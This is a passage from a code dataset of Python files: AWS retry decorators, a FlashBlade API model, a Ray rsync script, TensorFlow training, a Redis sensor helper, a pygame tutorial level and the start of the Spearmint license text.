time.sleep(metadata['delay'])\n try:\n retval = f(*args, **kwargs)\n metadata['delay'] = 0\n return retval\n except botocore.exceptions.ClientError as e:\n if e.response[\"Error\"][\"Code\"] not in RATE_LIMITING_ERRORS:\n raise e\n increase_delay(e)\n except boto.exception.BotoServerError as e:\n if e.error_code not in RATE_LIMITING_ERRORS:\n raise e\n increase_delay(e)\n\n return decorated_function\n\n return decorator\n\n\ndef paginated(response_key, request_pagination_marker=\"Marker\", response_pagination_marker=\"Marker\"):\n def decorator(func):\n @functools.wraps(func)\n def decorated_function(*args, **kwargs):\n results = []\n\n while True:\n response = func(*args, **kwargs)\n results.extend(response[response_key])\n\n if ('NextMarker' in response) or ('IsTruncated' in response and response['IsTruncated']):\n kwargs.update({request_pagination_marker: response[response_pagination_marker]})\n else:\n break\n return results\n return decorated_function\n return decorator\n"} {"ext": "py", "sha": "1a2f818a19975f04f66148cbe31157a7baa193a8", "content": "# coding: utf-8\n\n\"\"\"\n FlashBlade REST API\n\n A lightweight client for FlashBlade REST API 2.3, developed by Pure Storage, Inc. 
(http://www.purestorage.com/).\n\n OpenAPI spec version: 2.3\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re\n\nimport six\nimport typing\n\nfrom ....properties import Property\nif typing.TYPE_CHECKING:\n from pypureclient.flashblade.FB_2_3 import models\n\nclass ArrayConnectionResponse(object):\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'items': 'list[ArrayConnection]'\n }\n\n attribute_map = {\n 'items': 'items'\n }\n\n required_args = {\n }\n\n def __init__(\n self,\n items=None, # type: List[models.ArrayConnection]\n ):\n \"\"\"\n Keyword args:\n items (list[ArrayConnection])\n \"\"\"\n if items is not None:\n self.items = items\n\n def __setattr__(self, key, value):\n if key not in self.attribute_map:\n raise KeyError(\"Invalid key `{}` for `ArrayConnectionResponse`\".format(key))\n self.__dict__[key] = value\n\n def __getattribute__(self, item):\n value = object.__getattribute__(self, item)\n if isinstance(value, Property):\n return None\n else:\n return value\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n if hasattr(self, attr):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(ArrayConnectionResponse, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, ArrayConnectionResponse):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n"} {"ext": "py", "sha": "1a2f81c3e83be94b291073e1b5cb95eefa99a9ae", "content": "\"this program runs on ngc and syncs data with a local master machine\"\nimport time\nimport os\nimport ray\n\n\n@ray.remote\ndef sync(agentparams):\n master_datadir = agentparams['master_datadir']\n master = agentparams.get('master', 'deepthought')\n local_datadir = '/result'\n\n while True:\n print('transfer tfrecords to master')\n cmd = 'rsync -a --update {} {}:{}'.format(local_datadir + '/', master, master_datadir)\n print('executing: {}'.format(cmd))\n os.system(cmd)\n time.sleep(10)\n\nif __name__ == '__main__':\n conf = {}\n conf['master_datadir'] = '/raid/ngc2/pushing_data/cartgripper/mj_multi_obj_push3_75step'\n sync(0, conf)"} {"ext": "py", "sha": "1a2f832053fed1d3e402804f3c7c15ac914da468", "content": "import tensorflow as tf\nfrom build_model import embedded_neural_net, compile_model\n\n\ndef train_model(train_dataset: tf.data.Dataset, validation_dataset: tf.data.Dataset, max_features, patience=4,\n epochs=10):\n callback = tf.keras.callbacks.EarlyStopping(monitor='val_loss', 
patience=patience)\n model_structure = embedded_neural_net(max_features)\n model = compile_model(model_structure)\n history = model.fit(train_dataset, validation_data=validation_dataset, epochs=epochs, callbacks=[callback])\n return model, history\n"} {"ext": "py", "sha": "1a2f8358cd2da66b6bd0cb458a18ee8b8b9a3c91", "content": "import redis\nr = redis.Redis()\nfrom datetime import date\ntoday = str(date.today())\nimport datetime\nimport pickle\nexisted = False\n\nstand = [460, 1.3, .7]\n\ndef gas_lvl(gas):\n status = 'normal'\n gas = gas.replace(' ','')\n gases = gas.split('|')\n ox = float(gases[0])\n red = float(gases[1])\n nh = float(gases[2])\n \n ox_diff = (abs(ox-stand[0]) / stand[0] ) * 100\n red_diff = (abs(red-stand[1]) / stand[1] ) * 100\n nh_diff = (abs(nh-stand[2]) / stand[2] ) * 100\n \n if (ox_diff > 30 or red_diff > 30 or nh_diff > 30):\n status = 'abnormal' \n \n return status\n \n \n\n\nclass RedisHelper:\n\n def __init__(self):\n self.r = redis.Redis()\n self.existed = False\n self.dev_key = 'devices'\n \n def read(self, span=1800):\n \n current = {\n \"temp\": -1,\n \"humidity\" : -1,\n \"gas\" : \"abs\",\n \"alerts\" : -2,\n \"messages\" : -3\n }\n \n msg, msgC = self.messages()\n \n currentTime = datetime.datetime.now()\n day = currentTime.strftime(\"%d/%m/%Y\")\n \n key = day\n #print(key)\n\n if (self.r.exists(key)):\n persisted = pickle.loads(self.r.get(key))\n self.existed = True\n self.dev_key = 'devices'\n #print(persisted)\n \n else:\n persisted = {}\n\n\n timeHM = datetime.datetime.now()\n temp = 0\n humidity = 0\n pressure = 0\n count = 0\n\n for keys in persisted:\n date_time_obj = datetime.datetime.strptime(keys, '%d/%m/%Y@%H:%M:%S')\n diff = timeHM - date_time_obj\n \n #print(diff.seconds, span)\n if (diff.seconds <= span) :\n count = count + 1\n temp = temp + persisted[keys]['temp']\n humidity = humidity + persisted[keys]['humidity']\n pressure = pressure + persisted[keys]['pressure']\n #print(keys, persisted[keys], diff)\n \n if (count > 0):\n #print(f\"averages are {temp/count} {humidity/count} {pressure/count} {count} \")\n last = list(persisted.keys())\n last_one = len(last) - 1\n gases = persisted[last[last_one]]['gas']\n if (gas_lvl(gases) != 'normal'):\n alert_message = 'Alert!'\n else:\n alert_message = 'Normal'\n \n current = {\n \"temp\": round(temp/count,2),\n \"humidity\" : round(humidity/count,2),\n \"pressure\" : round(pressure/count,2),\n \"gas\" : gas_lvl(gases),\n \"alerts\" : alert_message,\n \"messages\" : msgC,\n \"count\" : count\n } \n \n \n return current\n \n \n def devices_read(self): \n if (r.exists(self.dev_key)):\n devices = pickle.loads(self.r.get(self.dev_key))\n else:\n devices = {}\n \n docs = []\n for dev in devices:\n docs.append(devices[dev]) \n\n return docs \n \n \n def devices_update(self, dev): \n devices = self.devices_read()\n devices.pop(dev, None)\n r.set(self.dev_key, pickle.dumps(devices)) \n return devices\n \n def messages(self):\n if (r.exists('messages')):\n messages = pickle.loads(self.r.get('messages'))\n else:\n messages = {} \n\n return messages, len(messages) \n \n \n\n\n "} {"ext": "py", "sha": "1a2f8500def564faf471bf2a79af3c8ccc1af5de", "content": "# importation de pygame\nimport pygame\n# importation de la bibliothèque system\nimport sys\n# importation de nos classes\nfrom Model.class_Hero import Hero\nfrom Model.class_Platform import Platform\nfrom Model.class_Atk import Atk\nfrom Model.class_SacDeSable import SacDeSable\nfrom utils import load_imgs\n\n\ndef exit_game(key):\n\tfrom Model.class_Menu 
import run\n\n\tif key == pygame.K_RETURN:\n\t\trun()\n\n\n# initialisation de pygame\ndef main(self):\n\tpygame.init()\n\n\tWIDTH = 1280\n\tHEIGHT = 720\n\tfenetre = pygame.display.set_mode((WIDTH, HEIGHT), pygame.RESIZABLE)\n\n\tfond_e = pygame.transform.scale(\n\t\tpygame.image.load(\"Images/Background/niveauRecurciforce.png\").convert(), (1280, 720)\n\t)\n\n\tblanchonAa1 = pygame.image.load(\"Images/Spell/aa1.png\").convert()\n\tblanchonAa2 = pygame.image.load(\"Images/Spell/aa2.png\").convert()\n\tblanchonAa3 = pygame.image.load(\"Images/Spell/aa3.png\").convert()\n\tblanchonAaMidAir = pygame.image.load(\"Images/Spell/aaMidAir.png\").convert()\n\tblanchonVector = pygame.image.load(\"Images/Spell/vector.png\").convert()\n\n\timagesBlanchonList = {\n\t\t\"Ridle\": [\"b_idle_1\", \"b_idle_2\"],\n\t\t\"Rmove\": [\"b_move_0\", \"b_move_1\", \"b_move_2\", \"b_move_1\"],\n\t\t\"Ffall\": [\"b_jumpdown_1\", \"b_jumpdown_2\"],\n\t\t\"Fcrouch\": [\"b_crouch_1\", \"b_crouch_2\"],\n\t\t\"Rslide\": [\"b_slide\"],\n\t\t\"Fjump\": [\"b_jumpup_1\", \"b_jumpup_2\", \"b_jumpup_3\"],\n\t\t\"Oaa1\": [\"b_aa1_1\", \"b_aa1_2\", \"b_aa1_3\", \"b_aa1_3\"],\n\t\t\"Oaa2\": [\"b_aa2_1\", \"b_aa2_2\", \"b_aa2_3\", \"b_aa2_4\", \"b_aa2_5\", \"b_aa2_5\"],\n\t\t\"Oaa3\": [\"b_aa3_1\", \"b_aa3_2\", \"b_aa3_3\", \"b_aa3_4\", \"b_aa3_5\", \"b_aa3_6\", \"b_aa3_6\", \"b_aa3_6\"],\n\t\t\"Oaaa\": [\"b_aa2_2\", \"b_atkjumpdown\", \"b_atkjumpdown\"],\n\t\t\"Odmg\": [\"b_dmg_2\", \"b_dmg_2\"],\n\t\t\"D\": [\"b_gameover\", \"b_gameover\"],\n\t}\n\tpath = \"Images/Blanchon\"\n\timagesBlanchon = load_imgs(imagesBlanchonList, path)\n\tblanchon_atkList = [\n\t\tAtk(\"autoHit1\", 0.5, 32, 32, load_imgs({\"idle\": [\"particlehit\"]}, path), 10, 5, -1, 0, 0, 0, 225),\n\t\tAtk(\"autoHit2\", 0.7, 32, 32, load_imgs({\"idle\": [\"particlehit\"]}, path), 15, 5, -2, 0, 0, 0, 300),\n\t\tAtk(\"autoHit3\", 0.7, 32, 32, load_imgs({\"idle\": [\"particlehit\"]}, path), 15, 6, -16, 0, 0, 0, 500),\n\t\tAtk(\"EOF\", 4, 32, 17, load_imgs({\"idle\": [\"vector\"]}, path), 15, 4, -1, 0, 4, 0, 2000),\n\t\tAtk(\"airAutoHit\", 1, 64, 32, load_imgs({\"idle\": [\"particlehit\"]}, path), 10, 5, 5, 0, 0, 0, 300)\n\t]\n\tblanchon = Hero(200, 200, 64, 64, imagesBlanchon, 0.3, 0.7, 8, 6, WIDTH, 100.0, blanchon_atkList)\n\tsol = Platform(0, HEIGHT-70, WIDTH, 10, pygame.image.load(\"Images/plateformtest.png\").convert_alpha(), 0.4)\n\t# INIT PLATEFORMES\n\tplatforms = [\n\t\tPlatform(100, HEIGHT - 180, 100, 10, pygame.image.load(\"Images/plateform.png\").convert_alpha(), 1),\n\t\tPlatform(350, HEIGHT - 280, 100, 10, pygame.image.load(\"Images/plateform.png\").convert_alpha(), 1)\n\t]\n\n\t# INIT ENNEMIS\n\tfoes = [SacDeSable(600, 500, WIDTH, 1)]\n\n\t# INIT SYSTEM CLOCK\n\tclock = pygame.time.Clock()\n\tfps = 60\n\tMult = pygame.font.Font(\"Polices/Lady Radical.ttf\", 25)\n\tMult.set_bold(False)\n\tMultB = pygame.font.Font(\"Polices/Lady Radical.ttf\", 40)\n\tMultB.set_bold(True)\n\tdamageFont = pygame.font.Font(\"Polices/Lady Radical.ttf\", 30)\n\t# damageFont.set_bold(True)\n\n\tdamageArray = []\n\ttimerDamage = 300\n\n\t# TEXTE DU TUTO------------------------------------------------------------------\n\tself.myfontMini = pygame.font.Font(\"Polices/Lady Radical.ttf\", 15)\n\tself.myfont = pygame.font.Font(\"Polices/Lady Radical.ttf\", 25)\n\tfleches = self.myfont.render(\"Les fleches directionnelles servent a se deplacer\", 1, (200, 200, 0))\n\tatkDeBase = self.myfont.render(\"'A' (Q sous Windows) permet de donner des coups au corps a corps\", 1, (200, 200, 
0))\n\tatkDistance = self.myfont.render(\"'Z' (W sous Windows) permet de lancer des projectiles\", 1, (200, 200, 0))\n\tcombol = self.myfont.render(\"Un combo est possible en realisant 3 attaques basiques successives\", 1, (200, 200, 0))\n\tdbSaut = self.myfont.render(\"Le double saut est possible\", 1, (200, 200, 0))\n\tquit1 = self.myfontMini.render(\"Appuyer sur 'Entree' pour \", 1, (200, 200, 0))\n\tquit2 = self.myfontMini.render(\"retourner au menu principal \", 1, (200, 200, 0))\n\n\twhile 1:\n\t\tclock.tick(fps)\n\t\t# GESTION EVENT------------------------------------------------------------------\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT: \t# si l'utilisateur clique sur la croix\n\t\t\t\tsys.exit() # on ferme la fenêtre\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\texit_game(event.key)\n\t\t\t\tblanchon.key_down(event)\n\t\t\tif event.type == pygame.KEYUP:\n\t\t\t\tblanchon.key_up(event)\n\n\t\t# GESTION DU DECORS--------------------------------------------------------------\n\t\t# Fond\n\t\tfenetre.blit(fond_e, (0, 0))\n\t\tself.screen.blit(fleches, (600, 50))\n\t\tself.screen.blit(atkDeBase, (600, 80))\n\t\tself.screen.blit(atkDistance, (600, 110))\n\t\tself.screen.blit(combol, (600, 140))\n\t\tself.screen.blit(dbSaut, (600, 170))\n\t\tself.screen.blit(quit1, (1100, 600))\n\t\tself.screen.blit(quit2, (1100, 620))\n\t\t# Plateformes\n\t\tnbPlatf = len(platforms)\n\t\tfor i in range(0, nbPlatf):\n\t\t\tfenetre.blit(platforms[i].get_img(), platforms[i].get_rect())\n\n\t\t# GESTION DU HERO----------------------------------------------------------------\n\t\t# Affichage Multiplicateur de dégats\n\t\tMultipl = Mult.render(\"Mult : \", 1, (255, 255, 0))\n\t\tcombo = blanchon.get_combo()\n\t\tif combo < 2:\n\t\t\tMultiplCombo = MultB.render(f\"{combo:.2f}\", 1, (255, 255, 0))\n\t\telif combo < 3:\n\t\t\tMultiplCombo = MultB.render(f\"{combo:.2f}\", 1, (0, 0, 255))\n\t\telif combo < 4:\n\t\t\tMultiplCombo = MultB.render(f\"{combo:.2f}\", 1, (255, 0, 255))\n\t\telse:\n\t\t\tMultiplCombo = MultB.render(f\"{combo:.2f}\", 1, (255, 0, 0))\n\n\t\tfenetre.blit(Multipl, (700, 680))\n\t\tfenetre.blit(MultiplCombo, (800, 670))\n\n\t\t# CoolDown Attaque de Blanchon\n\t\tcolorRect = (125, 125, 125, 128)\n\n\t\tif not blanchon.get_onGround():\n\t\t\tcd = blanchon_atkList[4].get_cd()\n\t\t\tif cd > 0:\n\t\t\t\tpygame.draw.rect(fenetre, (0, 0, 0), (95, 655, 60, 60))\n\t\t\telse:\n\t\t\t\tpygame.draw.rect(fenetre, (200, 200, 50), (95, 655, 60, 60))\n\t\t\ttailleRect1 = 60 * cd / blanchon_atkList[4].get_maxCd()\n\t\t\tposRect1 = 715 - tailleRect1\n\t\t\tfenetre.blit(blanchonAaMidAir, (100, 660))\n\t\t\tCdAH = damageFont.render(f\"{cd:.1f}\", 1, (255, 0, 0))\n\t\telif blanchon.get_autoHitTimer3() > 0:\n\t\t\tpygame.draw.rect(fenetre, (200, 200, 50), (95, 655, 60, 60))\n\t\t\tfenetre.blit(blanchonAa3, (100, 660))\n\t\t\ttailleRect1 = 60 * blanchon.get_autoHitTimer3() / 3000\n\t\t\tposRect1 = 715 - tailleRect1\n\t\t\tCdAH = damageFont.render(f\"{blanchon.get_autoHitTimer3()/1000:.1f}\", 1, (255, 0, 0))\n\t\telif blanchon.get_autoHitTimer2() > 0:\n\t\t\tpygame.draw.rect(fenetre, (200, 200, 50), (95, 655, 60, 60))\n\t\t\tfenetre.blit(blanchonAa2, (100, 660))\n\t\t\ttailleRect1 = 60 * blanchon.get_autoHitTimer2() / 3000\n\t\t\tposRect1 = 715 - tailleRect1\n\t\t\tCdAH = damageFont.render(f\"{blanchon.get_autoHitTimer2()/1000:.1f}\", 1, (255, 0, 0))\n\t\telse:\n\t\t\tcd = blanchon_atkList[0].get_cd()\n\t\t\tif cd > 0:\n\t\t\t\tpygame.draw.rect(fenetre, (0, 0, 0), (95, 655, 60, 
60))\n\t\t\telse:\n\t\t\t\tpygame.draw.rect(fenetre, (200, 200, 50), (95, 655, 60, 60))\n\n\t\t\tfenetre.blit(blanchonAa1, (100, 660))\n\t\t\ttailleRect1 = 60 * cd / blanchon_atkList[0].get_maxCd()\n\t\t\tposRect1 = 715 - tailleRect1\n\t\t\tCdAH = damageFont.render(f\"{cd:.1f}\", 1, (255, 0, 0))\n\n\t\tCaseAa = pygame.Surface((60, tailleRect1), pygame.SRCALPHA)\n\t\tCaseAa.fill(colorRect)\n\t\tfenetre.blit(CaseAa, (95, posRect1))\n\t\tif cd > 0:\n\t\t\tfenetre.blit(CdAH, (110, 670))\n\t\tif blanchon_atkList[3].get_cd() > 0:\n\t\t\tpygame.draw.rect(fenetre, (0, 0, 0), (175, 655, 60, 60))\n\t\t\tpygame.draw.rect(fenetre, (255, 255, 255), (180, 660, 50, 50))\n\t\telse:\n\t\t\tpygame.draw.rect(fenetre, (200, 200, 50), (175, 655, 60, 60))\n\t\t\tpygame.draw.rect(fenetre, (255, 255, 255), (180, 660, 50, 50))\n\n\t\tfenetre.blit(blanchonVector, (189, 677))\n\n\t\ttailleRect2 = 60 * blanchon_atkList[3].get_cd() / blanchon_atkList[3].get_maxCd()\n\t\tposRect2 = 715 - tailleRect2\n\t\tCaseAa = pygame.Surface((60, tailleRect2), pygame.SRCALPHA)\n\t\tCaseAa.fill((125, 125, 125, 128))\n\t\tfenetre.blit(CaseAa, (175, posRect2))\n\n\t\tCdProj = damageFont.render(f\"{blanchon_atkList[3].get_cd():.1f}\", 1, (255, 0, 0))\n\t\tif blanchon_atkList[3].get_cd() > 0:\n\t\t\tfenetre.blit(CdProj, (190, 670))\n\t\t# Teste Hero => Plateforme\n\t\theroOnGround = blanchon.isOnGround()\n\t\tblanchon.setOnAir()\n\t\tblanchon.testPlatform(sol)\n\t\tfor i in range(0, nbPlatf):\n\t\t\tblanchon.testPlatform(platforms[i])\n\n\t\t# Le hero est descendu d'une plateforme\n\t\tif heroOnGround and not blanchon.isOnGround():\n\t\t\tblanchon.giveDoubleJump() # On lui donne un saut\n\n\t\tblanchon.update(blanchon, fps)\n\n\t\t# AFFICHAGE DES DEGATS----------------------------------------------------------\n\t\ti = 0\n\t\twhile i < len(damageArray):\n\t\t\tif damageArray[i][2] > 0:\n\t\t\t\tfenetre.blit(damageArray[i][0], damageArray[i][1])\n\t\t\t\tdamageArray[i][2] = damageArray[i][2] - (1000/fps)\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tdamageArray.pop(i)\n\n\t\t# GESTION DES MOBS---------------------------------------------------------------\n\t\t# Teste Mob => Plateforme && Atk Hero => Mob\n\t\tnbAtkHero = len(blanchon.get_AtkEffectList())\n\t\ti = 0\n\t\twhile i < len(foes):\n\t\t\tfoes[i].nextImg(fps)\n\t\t\tfenetre.blit(foes[i].get_img(), foes[i].get_rect())\n\t\t\tpygame.draw.rect(\n\t\t\t\tfenetre, (0, 0, 0), (foes[i].get_rect().x, foes[i].get_rect().y - 10, 60, 6)\n\t\t\t)\n\t\t\tpygame.draw.rect(\n\t\t\t\tfenetre, (255, 0, 0), (\n\t\t\t\t\tfoes[i].get_rect().x, foes[i].get_rect().y - 10,\n\t\t\t\t\tint(max(min(foes[i].get_hp()/float(foes[i].get_hpMax())*60, 60), 0)), 6\n\t\t\t\t)\n\t\t\t)\n\t\t\tfoes[i].setOnAir()\n\t\t\tfoes[i].testPlatform(sol)\n\n\t\t\tfor j in range(0, nbPlatf):\n\t\t\t\tfoes[i].testPlatform(platforms[j])\n\n\t\t\t# Check si le mob i se fait toucher par l'atk de hero k\n\t\t\tfor k in range(0, nbAtkHero):\n\t\t\t\thpBefore = foes[i].get_hp()\n\t\t\t\tfoes[i].testAtkEffect(blanchon.get_AtkEffectList()[k])\n\t\t\t\tdegats = foes[i].get_hp() - hpBefore\n\t\t\t\tfoes[i].set_hp(degats)\n\t\t\t\tif degats < 0.0:\n\t\t\t\t\tdamageArray.append([\n\t\t\t\t\t\tdamageFont.render(f\"{degats:.1f}\", 1, (50, 150, 255)),\n\t\t\t\t\t\t(foes[i].get_x(), foes[i].get_y()-40), timerDamage\n\t\t\t\t\t])\n\n\t\t\tnbAtkFoe = len(foes[i].get_AtkEffectList())\n\t\t\tfor l in range(0, nbAtkFoe):\n\t\t\t\thpBefore = blanchon.get_hp()\n\t\t\t\tblanchon.testAtkEffect(foes[i].get_AtkEffectList()[l])\n\t\t\t\tdegats = 
blanchon.get_hp() - hpBefore\n\t\t\t\tif degats < 0:\n\t\t\t\t\tdamageArray.append([\n\t\t\t\t\t\tdamageFont.render(f\"{degats:.1f}\", 1, (255, 0, 0)),\n\t\t\t\t\t\t(blanchon.get_x(), blanchon.get_y()-40), timerDamage\n\t\t\t\t\t])\n\n\t\t\t\tfenetre.blit(\n\t\t\t\t\tfoes[i].get_AtkEffectList()[l].get_img(),\n\t\t\t\t\tfoes[i].get_AtkEffectList()[l].get_rect()\n\t\t\t\t)\n\n\t\t\tfoes[i].update(blanchon, fps)\n\t\t\tif foes[i].get_hp() <= 0:\n\t\t\t\tfoes.pop(i)\n\t\t\telse:\n\t\t\t\ti += 1\n\n\t\tfor i in range(0, nbAtkHero):\n\t\t\tfenetre.blit(blanchon.get_AtkEffectList()[k].get_img(), blanchon.get_AtkEffectList()[k].get_rect())\n\n\t\t# Affichage Hero\n\t\tblanchon.nextImg(fps)\n\t\tfenetre.blit(blanchon.get_img(), blanchon.get_rect())\n\t\tpygame.draw.rect(fenetre, (0, 0, 0), (blanchon.get_rect().x, blanchon.get_rect().y - 10, 60, 6))\n\t\tpygame.draw.rect(\n\t\t\tfenetre, (0, 255, 0), (\n\t\t\t\tblanchon.get_rect().x, blanchon.get_rect().y - 10,\n\t\t\t\tint(max(min(blanchon.get_hp()/float(blanchon.get_hpMax()) * 60, 60), 0)), 6\n\t\t\t)\n\t\t)\n\n\t\tpygame.display.flip()\n"} {"ext": "py", "sha": "1a2f850141c540cc0f646cba5238e1b9ff313898", "content": "# -*- coding: utf-8 -*-\n# Spearmint\n#\n# Academic and Non-Commercial Research Use Software License and Terms\n# of Use\n#\n# Spearmint is a software package to perform Bayesian optimization\n# according to specific algorithms (the “Software”). The Software is\n# designed to automatically run experiments (thus the code name\n# 'spearmint') in a manner that iteratively adjusts a number of\n# parameters so as to minimize some objective in as few runs as\n# possible.\n#\n# The Software was developed by Ryan P. Adams, Michael Gelbart, and\n# Jasper Snoek at Harvard University, Kevin Swersky at the\n# University of Toronto (“Toronto”), and Hugo Larochelle at the\n# Université de Sherbrooke (“Sherbrooke”), which assigned its rights\n# in the Software to Socpra Sciences et Génie\n# S.E.C. (“Socpra”). Pursuant to an inter-institutional agreement\n# between the parties, it is distributed for free academic and\n# non-commercial research use by the President and Fellows of Harvard\n# College (“Harvard”).\n#\n# Using the Software indicates your agreement to be bound by the terms\n# of this Software Use Agreement (“Agreement”). Absent your agreement\n# to the terms below, you (the “End User”) have no rights to hold or\n# use the Software whatsoever.\n#\n# Harvard agrees to grant hereunder the limited non-exclusive license\n# to End User for the use of the Software in the performance of End\n# User’s internal, non-commercial research and academic use at End\n# User’s academic or not-for-profit research institution\n# (“Institution”) on the following terms and conditions:\n#\n# 1. NO REDISTRIBUTION. The Software remains the property Harvard,\n# Toronto and Socpra, and except as set forth in Section 4, End User\n# shall not publish, distribute, or otherwise transfer or make\n# available the Software to any other party.\n#\n# 2. NO COMMERCIAL USE. End User shall not use the Software for\n# commercial purposes and any such use of the Software is expressly\n# prohibited. This includes, but is not limited to, use of the\n# Software in fee-for-service arrangements, core facilities or\n# laboratories or to provide research services to (or in collaboration\n# with) third parties for a fee, and in industry-sponsored\n# collaborative research projects where any commercial rights are\n# granted to the sponsor. 
If End User wishes to use the Software for\n# commercial purposes or for any other restricted purpose, End User\n# must execute a separate license agreement with Harvard.\n#\n# Requests for use of the Software for commercial purposes, please\n# contact:\n#\n# Office of Technology Development\n# Harvard University\n# Smith Campus Center, Suite 727E\n# 1350 Massachusetts Avenue\n# Cambridge, MA 02138 USA\n# Telephone: (617) 495-3067\n# Facsimile: (617) 495-9568\n# E-mail: otd@harvard.edu\n#\n# 3. OWNERSHIP AND COPYRIGHT NOTICE. Harvard, Toronto and Socpra own\n# all intellectual property in the Software. End User shall gain no\n# ownership to the Software. End User shall not remove or delete and\n# shall retain in the Software, in any modifications to Software and\n# in any Derivative Works, the copyright, trademark, or other notices\n# pertaining to Software as provided with the Software.\n#\n# 4. DERIVATIVE WORKS. End User may create and use Derivative Works,\n# as such term is defined under U.S. copyright laws, provided that any\n# such Derivative Works shall be restricted to non-commercial,\n# internal research and academic use at End User’s Institution. End\n# User may distribute Derivative Works to other Institutions solely\n# for the performance of non-commercial, internal research and\n# academic use on terms substantially similar to this License and\n# Terms of Use.\n#\n# 5. FEEDBACK. In order to improve the Software, comments from End\n# Users may be useful. End User agrees to provide Harvard with\n# feedback on the End User’s use of the Software (e.g., any bugs in\n# the Software, the user experience, etc.). Harvard is permitted to\n# use such information provided by End User in making changes and\n# improvements to the Software without compensation or an accounting\n# to End User.\n#\n# 6. NON ASSERT. End User acknowledges that Harvard, Toronto and/or\n# Sherbrooke or Socpra may develop modifications to the Software that\n# may be based on the feedback provided by End User under Section 5\n# above. Harvard, Toronto and Sherbrooke/Socpra shall not be\n# restricted in any way by End User regarding their use of such\n# information. End User acknowledges the right of Harvard, Toronto\n# and Sherbrooke/Socpra to prepare, publish, display, reproduce,\n# transmit and or use modifications to the Software that may be\n# substantially similar or functionally equivalent to End User’s\n# modifications and/or improvements if any. In the event that End\n# User obtains patent protection for any modification or improvement\n# to Software, End User agrees not to allege or enjoin infringement of\n# End User’s patent against Harvard, Toronto or Sherbrooke or Socpra,\n# or any of the researchers, medical or research staff, officers,\n# directors and employees of those institutions.\n#\n# 7. PUBLICATION & ATTRIBUTION. End User has the right to publish,\n# present, or share results from the use of the Software. 
In\n# accordance with customary academic practice, End User will\n# acknowledge Harvard, Toronto and Sherbrooke/Socpra as the providers\n# of the Software and may cite the relevant reference(s) from the\n# following list of publications:\n#\n# Practical Bayesian Optimization of Machine Learning Algorithms\n# Jasper Snoek, Hugo Larochelle and Ryan Prescott Adams\n# Neural Information Processing Systems, 2012\n#\n# Multi-Task Bayesian Optimization\n# Kevin Swersky, Jasper Snoek and Ryan Prescott Adams\n# Advances in Neural Information Processing Systems, 2013\n#\n# Input Warping for Bayesian Optimization of Non-stationary Functions\n# Jasper Snoek, Kevin Swersky, Richard Zemel and Ryan Prescott Adams\n# Preprint, arXiv:1402.0929, http://arxiv.org/abs/1402.0929, 2013\n#\n# Bayesian Optimization and Semiparametric Models with Applications to\n# Assistive Technology Jasper Snoek, PhD Thesis, University of\n# Toronto, 2013\n#\n# 8. NO WARRANTIES. THE SOFTWARE IS PROVIDED \"AS IS.\" TO THE FULLEST\n# EXTENT PERMITTED BY LAW, HARVARD, TORONTO AND SHERBROOKE AND SOCPRA\n# HEREBY DISCLAIM ALL WARRANTIES OF ANY KIND (EXPRESS, IMPLIED OR\n# OTHERWISE) REGARDING THE SOFTWARE, INCLUDING BUT NOT LIMITED TO ANY\n# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR\n# PURPOSE, OWNERSHIP, AND NON-INFRINGEMENT. HARVARD, TORONTO AND\n# SHERBROOKE AND SOCPRA MAKE NO WARRANTY ABOUT THE ACCURACY,\n# RELIABILITY, COMPLETENESS, TIMELINESS, SUFFICIENCY OR QUALITY OF THE\n# SOFTWARE. HARVARD, TORONTO AND SHERBROOKE AND SOCPRA DO NOT WARRANT\n# THAT THE SOFTWARE WILL OPERATE WITHOUT ERROR OR INTERRUPTION.\n#\n# 9. LIMITATIONS OF LIABILITY AND REMEDIES. USE OF THE SOFTWARE IS AT\n# END USER’S OWN RISK. IF END USER IS DISSATISFIED WITH THE SOFTWARE,\n# ITS EXCLUSIVE REMEDY IS TO STOP USING IT. IN NO EVENT SHALL\n# HARVARD, TORONTO OR SHERBROOKE OR SOCPRA BE LIABLE TO END USER OR\n# ITS INSTITUTION, IN CONTRACT, TORT OR OTHERWISE, FOR ANY DIRECT,\n# INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR OTHER\n# DAMAGES OF ANY KIND WHATSOEVER ARISING OUT OF OR IN CONNECTION WITH\n# THE SOFTWARE, EVEN IF HARVARD, TORONTO OR SHERBROOKE OR SOCPRA IS\n# NEGLIGENT OR OTHERWISE AT FAULT, AND REGARDLESS OF WHETHER HARVARD,\n# TORONTO OR SHERBROOKE OR SOCPRA IS ADVISED OF THE POSSIBILITY OF\n# SUCH DAMAGES.\n#\n# 10. INDEMNIFICATION. To the extent permitted by law, End User shall\n# indemnify, defend and hold harmless Harvard, Toronto and Sherbrooke\n# and Socpra, their corporate affiliates, current or future directors,\n# trustees, officers, faculty, medical and professional staff,\n# employees, students and agents and their respective successors,\n# heirs and assigns (the \"Indemnitees\"), against any liability,\n# damage, loss or expense (including reasonable attorney's fees and\n# expenses of litigation) incurred by or imposed upon the Indemnitees\n# or any one of them in connection with any claims, suits, actions,\n# demands or judgments arising from End User’s breach of this\n# 